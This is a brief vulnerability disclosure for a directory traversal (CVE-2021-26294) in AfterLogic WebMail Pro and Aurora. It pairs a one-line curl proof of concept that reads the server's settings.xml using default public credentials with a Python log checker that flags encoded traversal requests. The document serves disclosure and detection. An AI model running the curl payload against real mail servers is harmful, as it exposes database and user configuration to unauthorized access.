# WebMail Pro 7.7.9 Directory Traversal (CVE-2021-26294)
AfterLogic Aurora and WebMail Pro 7.7.9 and all earlier versions are affected: an unauthorized attacker can read files such as the database and user configuration files.
PoC:
```
curl -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml"
```
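As an added defensive example (not from the original post or from AfterLogic), the check below percent-decodes and normalises request paths taken from constructed web-server log lines and flags any that resolve outside the DAV files root seen in the PoC; the log format, host address and the `DAV_FILES_ROOT` constant are assumptions.

```python
import posixpath
import re
from urllib.parse import unquote

# Assumed from the PoC URL on this page: the DAV files endpoint that every
# legitimate request should stay underneath once the path is normalised.
DAV_FILES_ROOT = "/dav/server.php/files"

# Constructed access-log lines (combined log format, hypothetical host).
# The second line carries the encoded traversal from the PoC above.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Mar/2021:10:01:02 +0000] "GET /dav/server.php/files/personal/report.pdf HTTP/1.1" 200 4821
203.0.113.5 - - [10/Mar/2021:10:01:09 +0000] "GET /dav/server.php/files/personal/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data/settings/settings.xml HTTP/1.1" 200 1733
203.0.113.9 - - [10/Mar/2021:10:02:15 +0000] "PROPFIND /dav/server.php/files/personal/ HTTP/1.1" 207 950
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def escapes_files_root(raw_path: str) -> bool:
    """True if the request path, once percent-decoded and normalised,
    resolves outside DAV_FILES_ROOT (i.e. "../" segments escaped it)."""
    path = unquote(raw_path.split("?", 1)[0])  # %2e -> ".", drop any query string
    if not path.startswith(DAV_FILES_ROOT + "/"):
        return False  # not a DAV files request; out of scope for this check
    # normpath collapses "a/../b" and "//" the same way the filesystem would,
    # so the check works on the resolved path rather than on a literal ".."
    normalised = posixpath.normpath(path)
    return normalised != DAV_FILES_ROOT and not normalised.startswith(DAV_FILES_ROOT + "/")


def find_traversal_requests(log_text: str) -> list[str]:
    """Return the raw request paths in the log that escape the DAV files root."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if m and escapes_files_root(m.group("path")):
            hits.append(m.group("path"))
    return hits


if __name__ == "__main__":
    for p in find_traversal_requests(SAMPLE_LOG):
        print("traversal:", p)
```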
Ref:
* https://nvd.nist.gov/vuln/detail/CVE-2021-26294
* https://github.com/E3SEC/AfterLogic/blob/main/CVE-2021-26294-exposure-of-sensitive-information-vulnerability.md